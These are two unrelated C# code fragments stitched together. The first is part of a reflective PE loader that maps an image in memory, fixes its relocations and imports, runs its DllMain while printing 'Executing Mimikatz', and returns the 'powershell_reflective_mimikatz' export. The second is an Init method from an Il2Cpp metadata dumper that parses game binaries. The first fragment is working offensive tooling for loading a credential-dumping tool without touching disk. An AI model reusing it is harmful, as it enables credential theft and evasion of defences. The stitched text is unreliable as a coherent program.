(NativeDeclarations.IMAGE_BASE_RELOCATION)Marshal.PtrToStructure(x, typeof(NativeDeclarations.IMAGE_BASE_RELOCATION)); IntPtr dest = IntPtrAdd(codebase, (int)relocationEntry.VirtualAdress); for (int i = 0; i < (int)((relocationEntry.SizeOfBlock - imageSizeOfBaseRelocation) / 2); i++) { IntPtr patchAddr; UInt16 value = (UInt16)Marshal.ReadInt16(offset, 8 + (2 * i)); UInt16 type = (UInt16)(value >> 12); UInt16 fixup = (UInt16)(value & 0xfff); switch (type) { case 0x0: break; case 0x3: patchAddr = IntPtrAdd(dest, fixup); //Add Delta To Location. int originalx86Addr = Marshal.ReadInt32(patchAddr); Marshal.WriteInt32(patchAddr, originalx86Addr + (int)delta); break; case 0xA: patchAddr = IntPtrAdd(dest, fixup); //Add Delta To Location. long originalAddr = Marshal.ReadInt64(patchAddr); Marshal.WriteInt64(patchAddr, originalAddr + delta); break; } } offset = IntPtrAdd(relocationTable, sizeofNextBlock); sizeofNextBlock += (int)relocationNextEntry.SizeOfBlock; relocationEntry = relocationNextEntry; nextEntry = IntPtrAdd(nextEntry, sizeofNextBlock); if (relocationNextEntry.SizeOfBlock == 0) { break; } } //Resolve Imports IntPtr z; IntPtr oa1; int oa2; if (pe.Is32BitHeader) { z = IntPtrAdd(codebase, (int)pe.ImageSectionHeaders[1].VirtualAddress); oa1 = IntPtrAdd(codebase, (int)pe.OptionalHeader32.ImportTable.VirtualAddress); oa2 = Marshal.ReadInt32(IntPtrAdd(oa1, 16)); } else { z = IntPtrAdd(codebase, (int)pe.ImageSectionHeaders[1].VirtualAddress); oa1 = IntPtrAdd(codebase, (int)pe.OptionalHeader64.ImportTable.VirtualAddress); oa2 = Marshal.ReadInt32(IntPtrAdd(oa1, 16)); } //Get And Display Each DLL To Load IntPtr threadStart; uint imageSize; if (pe.Is32BitHeader) { int j = 0; while (true) //HardCoded Number of DLL's Do this Dynamically. { IntPtr a1 = IntPtrAdd(codebase, (20 * j) + (int)pe.OptionalHeader32.ImportTable.VirtualAddress); int entryLength = Marshal.ReadInt32(IntPtrAdd(a1, 16)); IntPtr a2 = IntPtrAdd(codebase, (int)pe.ImageSectionHeaders[1].VirtualAddress + (entryLength - oa2)); IntPtr dllNamePTR = (IntPtr)(IntPtrAdd(codebase, Marshal.ReadInt32(IntPtrAdd(a1, 12)))); string DllName = Marshal.PtrToStringAnsi(dllNamePTR); if (DllName == "") { break; } IntPtr handle; try { handle = NativeDeclarations.LoadLibrary(DllName); } catch (Exception) { continue; } #if DEBUG Console.WriteLine("Loaded {0}", DllName); #endif int k = 0; while (true) { IntPtr dllFuncNamePTR = (IntPtrAdd(codebase, Marshal.ReadInt32(a2))); string DllFuncName = Marshal.PtrToStringAnsi(IntPtrAdd(dllFuncNamePTR, 2)); IntPtr funcAddy = NativeDeclarations.GetProcAddress(handle, DllFuncName); Marshal.WriteInt32(a2, (int)funcAddy); a2 = IntPtrAdd(a2, 4); if (DllFuncName == "") { break; } k++; } j++; } //Transfer Control To OEP imageSize = pe.OptionalHeader32.SizeOfImage; #if DEBUG Console.WriteLine("Executing Mimikatz"); #endif //Call dllmain threadStart = IntPtrAdd(codebase, (int)pe.OptionalHeader32.AddressOfEntryPoint); main dllmain = (main)Marshal.GetDelegateForFunctionPointer(threadStart, typeof(main)); dllmain(codebase, 1, IntPtr.Zero); #if DEBUG Console.WriteLine("Thread Complete"); #endif } else { int j = 0; while (true) { IntPtr a1 = IntPtrAdd(codebase, (20 * j) + (int)pe.OptionalHeader64.ImportTable.VirtualAddress); int entryLength = Marshal.ReadInt32(IntPtrAdd(a1, 16)); IntPtr a2 = IntPtrAdd(codebase, (int)pe.ImageSectionHeaders[1].VirtualAddress + (entryLength - oa2)); //Need just last part? IntPtr dllNamePTR = (IntPtr)(IntPtrAdd(codebase, Marshal.ReadInt32(IntPtrAdd(a1, 12)))); string DllName = Marshal.PtrToStringAnsi(dllNamePTR); if (DllName == "") { break; } IntPtr handle; try { handle = NativeDeclarations.LoadLibrary(DllName); } catch (Exception) { continue; } #if DEBUG Console.WriteLine("Loaded {0}", DllName); #endif int k = 0; while (true) { IntPtr dllFuncNamePTR = (IntPtrAdd(codebase, Marshal.ReadInt32(a2))); string DllFuncName = Marshal.PtrToStringAnsi(IntPtrAdd(dllFuncNamePTR, 2)); //Console.WriteLine("Function {0}", DllFuncName); IntPtr funcAddy = NativeDeclarations.GetProcAddress(handle, DllFuncName); Marshal.WriteInt64(a2, (long)funcAddy); a2 = IntPtrAdd(a2, 8); if (DllFuncName == "") { break; } k++; } j++; } //Transfer Control To OEP imageSize = pe.OptionalHeader64.SizeOfImage; #if DEBUG Console.WriteLine("Executing Mimikatz"); #endif //Call dllmain threadStart = IntPtrAdd(codebase, (int)pe.OptionalHeader64.AddressOfEntryPoint); main dllmain = (main)Marshal.GetDelegateForFunctionPointer(threadStart, typeof(main)); dllmain(codebase, 1, IntPtr.Zero); #if DEBUG Console.WriteLine("Thread Complete"); #endif } IntPtr powerKatzFuncPtr = GetFuncExport(pe, "powershell_reflective_mimikatz"); if (powerKatzFuncPtr == IntPtr.Zero) { return(powerKatzFuncPtr); } else { return(powerKatzFuncPtr); } }
private bool Init(string il2CppPath, string metadataPath, out Metadata metadata, out Il2Cpp il2Cpp) { WriteOutput("Read config...", Color.Black); if (File.Exists(realPath + "config.json")) { _config = JsonConvert.DeserializeObject <Config>(File.ReadAllText(Application.StartupPath + Path.DirectorySeparatorChar + "config.json")); } else { _config = new Config(); WriteOutput("config.json file does not exist. Using defaults", Color.Yellow); } WriteOutput("Initializing metadata..."); var metadataBytes = File.ReadAllBytes(metadataPath); metadata = new Metadata(new MemoryStream(metadataBytes)); WriteOutput($"Metadata Version: {metadata.Version}"); WriteOutput("Initializing il2cpp file..."); var il2CppBytes = File.ReadAllBytes(il2CppPath); var il2CppMagic = BitConverter.ToUInt32(il2CppBytes, 0); var il2CppMemory = new MemoryStream(il2CppBytes); switch (il2CppMagic) { default: WriteOutput("ERROR: il2cpp file not supported."); throw new NotSupportedException("ERROR: il2cpp file not supported."); case 0x6D736100: var web = new WebAssembly(il2CppMemory); il2Cpp = web.CreateMemory(); break; case 0x304F534E: var nso = new NSO(il2CppMemory); il2Cpp = nso.UnCompress(); break; case 0x905A4D: //PE il2Cpp = new PE(il2CppMemory); break; case 0x464c457f: //ELF if (il2CppBytes[4] == 2) //ELF64 { var addressValue = ""; il2Cpp = InputBox.Show("Input il2cpp dump address or leave empty to force continue:", "", ref addressValue) != DialogResult.OK ? string.IsNullOrWhiteSpace(addressValue) ? new Elf64(il2CppMemory) : new Elf64(il2CppMemory, addressValue) : new Elf64(il2CppMemory); } else { var addressValue = ""; il2Cpp = InputBox.Show("Input il2cpp dump address or leave empty to force continue:", "", ref addressValue) != DialogResult.OK ? string.IsNullOrWhiteSpace(addressValue) ? new Elf(il2CppMemory) : new Elf(il2CppMemory, addressValue) : new Elf(il2CppMemory); } break; case 0xCAFEBABE: //FAT Mach-O case 0xBEBAFECA: var machofat = new MachoFat(new MemoryStream(il2CppBytes)); WriteOutput("Select Platform: "); for (var i = 0; i < machofat.fats.Length; i++) { var fat = machofat.fats[i]; WriteOutput(fat.magic == 0xFEEDFACF ? $"{i + 1}.64bit " : $"{i + 1}.32bit "); } WriteOutput(""); var key = Console.ReadKey(true); var index = int.Parse(key.KeyChar.ToString()) - 1; var magic = machofat.fats[index % 2].magic; il2CppBytes = machofat.GetMacho(index % 2); il2CppMemory = new MemoryStream(il2CppBytes); if (magic == 0xFEEDFACF) { goto case 0xFEEDFACF; } else { goto case 0xFEEDFACE; } case 0xFEEDFACF: // 64bit Mach-O il2Cpp = new Macho64(il2CppMemory); break; case 0xFEEDFACE: // 32bit Mach-O il2Cpp = new Macho(il2CppMemory); break; } var version = _config.ForceIl2CppVersion ? _config.ForceVersion : metadata.Version; il2Cpp.SetProperties(version, metadata.maxMetadataUsages); WriteOutput($"Il2Cpp Version: {il2Cpp.Version}"); if (il2Cpp.Version >= 27 && il2Cpp is ElfBase elf && elf.IsDumped) { var metadataValue = ""; if (InputBox.Show("Input global-metadata.dat dump address:", "", ref metadataValue) != DialogResult.OK) { return(false); } metadata.Address = Convert.ToUInt64(metadataValue, 16); WriteOutput($"global-metadata.dat dump address: {metadataValue}"); } WriteOutput("Searching..."); try { var flag = il2Cpp.PlusSearch(metadata.methodDefs.Count(x => x.methodIndex >= 0), metadata.typeDefs.Length, metadata.imageDefs.Length); if (RuntimeInformation.IsOSPlatform(OSPlatform.Windows) && !flag && il2Cpp is PE) { WriteOutput("Use custom PE loader"); il2Cpp = PELoader.Load(il2CppPath); il2Cpp.SetProperties(version, metadata.maxMetadataUsages); flag = il2Cpp.PlusSearch(metadata.methodDefs.Count(x => x.methodIndex >= 0), metadata.typeDefs.Length, metadata.imageDefs.Length); } if (!flag) { flag = il2Cpp.Search(); } if (!flag) { flag = il2Cpp.SymbolSearch(); } if (!flag) { WriteOutput("ERROR: Can't use auto mode to process file, try manual mode."); WriteOutput("Input CodeRegistration: "); var codeValue = ""; if (InputBox.Show(@"Input CodeRegistration: ", "", ref codeValue) != DialogResult.OK) { return(false); } var codeRegistration = Convert.ToUInt64(codeValue, 16); WriteOutput($"CodeRegistration: {codeValue}"); var metadataValue = ""; if (InputBox.Show("Input MetadataRegistration: ", "", ref metadataValue) != DialogResult.OK) { return(false); } var metadataRegistration = Convert.ToUInt64(metadataValue, 16); WriteOutput($"MetadataRegistration: {metadataValue}"); il2Cpp.Init(codeRegistration, metadataRegistration); return(true); } } catch (Exception e) { WriteOutput(e.Message); WriteOutput("ERROR: An error occurred while processing."); return(false); } return(true); }